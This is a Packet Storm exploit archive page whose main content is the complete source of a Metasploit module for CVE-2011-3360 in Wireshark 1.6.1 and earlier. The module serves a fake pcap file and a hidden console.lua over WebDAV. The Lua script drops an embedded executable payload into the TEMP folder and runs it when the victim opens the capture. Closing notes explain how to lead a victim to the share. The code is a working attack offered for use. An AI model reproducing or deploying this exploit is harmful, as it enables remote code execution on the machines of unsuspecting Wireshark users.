exploit the possibilities

Wireshark 1.6 console.lua Pre-Load / Execution

Wireshark 1.6 console.lua Pre-Load / Execution
Posted Nov 20, 2011
Authored by sinn3r | Site metasploit.com

This Metasploit modules exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there's a 'console.lua' file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8

tags | exploit
advisories | CVE-2011-3360, OSVDB-75347
MD5 | 3077a53671652e3dd6309e4b16836463

Wireshark 1.6 console.lua Pre-Load / Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => "Wireshark console.lua pre-loading vulnerability",
'Description' => %q{
This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a
pcap file, Wireshark will actually check if there's a 'console.lua' file in the same
directory, and then parse/execute the script if found. Versions affected by this
vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r', #Metasploit
],
'References' =>
[
['CVE', '2011-3360'],
['OSVDB', '75347'],
['URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136'],
['URL', 'http://technet.microsoft.com/en-us/security/advisory/2269637']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'win',
'Targets' =>
[
['Wireshark 1.6.1 or less', {}],
],
'Privileged' => false,
'DisclosureDate' => "Jul 18 2011", #Didn't go public until 2011-09-21 though
'DefaultTarget' => 0))

register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
OptString.new('SHARENAME', [ true, "The name of the top-level share.", "files"]),
OptString.new('URIPATH', [ true, "The URI to use", "/" ]),
OptString.new('FILENAME', [ true, "The name of the pcap file", "msf.pcap"])
], self.class)

deregister_options('SSL', 'SSLVersion') # WebDAV does not support SSL
end

def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
when 'PROPFIND'
process_propfind(cli, request)
when 'GET'
process_get(cli, request)
else
print_status("#{cli.peerhost}:#{cli.peerport} #{request.method} => 404 (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
end

def process_get(cli, request)
print_status("URI requested: #{request.uri.to_s}")
if request.uri =~ /\.lua$/
# Load lua script
print_status("Sending lua script")
send_response(cli, @p, {'Content-Type'=>'application/octet-stream'})
elsif request.uri =~ /#{datastore['FILENAME']}/
# Load an empty pcap file
# Format reference: http://wiki.wireshark.org/Development/LibpcapFileFormat
pcap = ''
pcap << "\xd4\xc3\xb2\xa1" #Magic number
pcap << "\x02\x00" #Major version number
pcap << "\x04\x00" #Minor version number
pcap << "\x00\x00\x00\x00" #GMT to local correction
pcap << "\x00\x00\x00\x00" #Accuracy of timestamp
pcap << "\xff\xff\x00\x00" #Maxlength of captured packets in octets
pcap << "\x01\x00\x00\x00" #Data length type
print_status("Sending fake pcap file")
send_response(cli, pcap, {'Content-Type'=>'application/octet-stream'})
else
# Don't know the request, return not found
print_error("Don't care about this file, 404")
send_not_found(cli)
end
return
end

def process_options(cli, request)
vprint_status("#{cli.peerhost}:#{cli.peerport} OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}

resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ''
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end

def process_propfind(cli, request)
path = request.uri
vprint_status("Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}")
body = ''

my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
my_uri = "http://#{my_host}/"

if path !~ /\/$/
if path.index(".")
print_status("Sending 404 for #{path} ...")
resp = create_response(404, "Not Found")
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
return
else
print_status("Sending 301 for #{path} ...")
resp = create_response(301, "Moved")
resp["Location"] = path + "/"
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
return
end
end

print_status("Sending directory multistatus for #{path} ...")

body = <<-BODY
<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>
<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
BODY

body = body.gsub(/^\t\t/, '')

if request["Depth"].to_i > 0
if path.scan("/").length < 2
body << generate_shares(path)
else
#Set filenames, and set the hidden attribute
filenames =
[
['console.lua', true],
[datastore['FILENAME'], false]
]
body << generate_files(path, filenames)
end
end

body << "</D:multistatus>"

body.gsub!(/\t/, '')

# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml; charset="utf8"'
cli.send_response(resp)
end

def gen_timestamp(ttype=nil)
::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
end

def gen_datestamp(ttype=nil)
::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
end

def generate_shares(path)
share_name = datastore['SHARENAME']
share = <<-SHARE
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
SHARE
share = share.gsub(/^\t\t/, '')
return share
end

def generate_files(path, items)
trail = path.split("/")
return "" if trail.length < 2

files = ""
items.each do |f, hide|
h = hide ? '1' : '0'
files << <<-FILES
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{f}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
<D:ishidden b:dt="boolean">#{h}</D:ishidden>
</D:propstat>
</D:response>
FILES
end

files = files.gsub(/^\t\t\t/, '')

return files
end

def get_lua_payload
# Generate our executable payload, and then convert every byte
# in decimal format
p = generate_payload_exe
buf = ''
p.each_byte do |b|
buf << "\\#{b.to_s}"
end

# Create the lua script that contains our payload
var_payload_name = rand_text_alpha(5)
var_temp_name = rand_text_alpha(5)
lua_script = <<-LUA
#{var_payload_name} = "#{buf}"

#{var_temp_name} = os.getenv("TEMP") .. os.tmpname() .. ".exe"
local f = io.open(#{var_temp_name}, "wb")
f:write(#{var_payload_name})
f:close()
os.execute(#{var_temp_name})
LUA

lua_script = lua_script.gsub(/^\t\t/, '')
return lua_script
end

def exploit
@p = get_lua_payload
super
end
end

=begin
Example of how to open the share:
My Computer -> Tools -> Map Network Driver -> Sign up for online storage or
connect to a network server -> Choose another network location ->
enter the network address

On an unpatched XP SP3 (and other Windows systems), the ideal URI format is like this:
http://192.168.1.11/
But on a fully patched XP SP3, the same URI format will not work. Windows will try to list
the share via SMB, and the victim will not see the share. In this case, you should specify
the URI to like this:
http://192.168.1.11/files
=end

Comments (1)

RSS Feed Subscribe to this comment feed
phong1122

thank

Comment by phong1122
2011-11-20 17:45:58 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close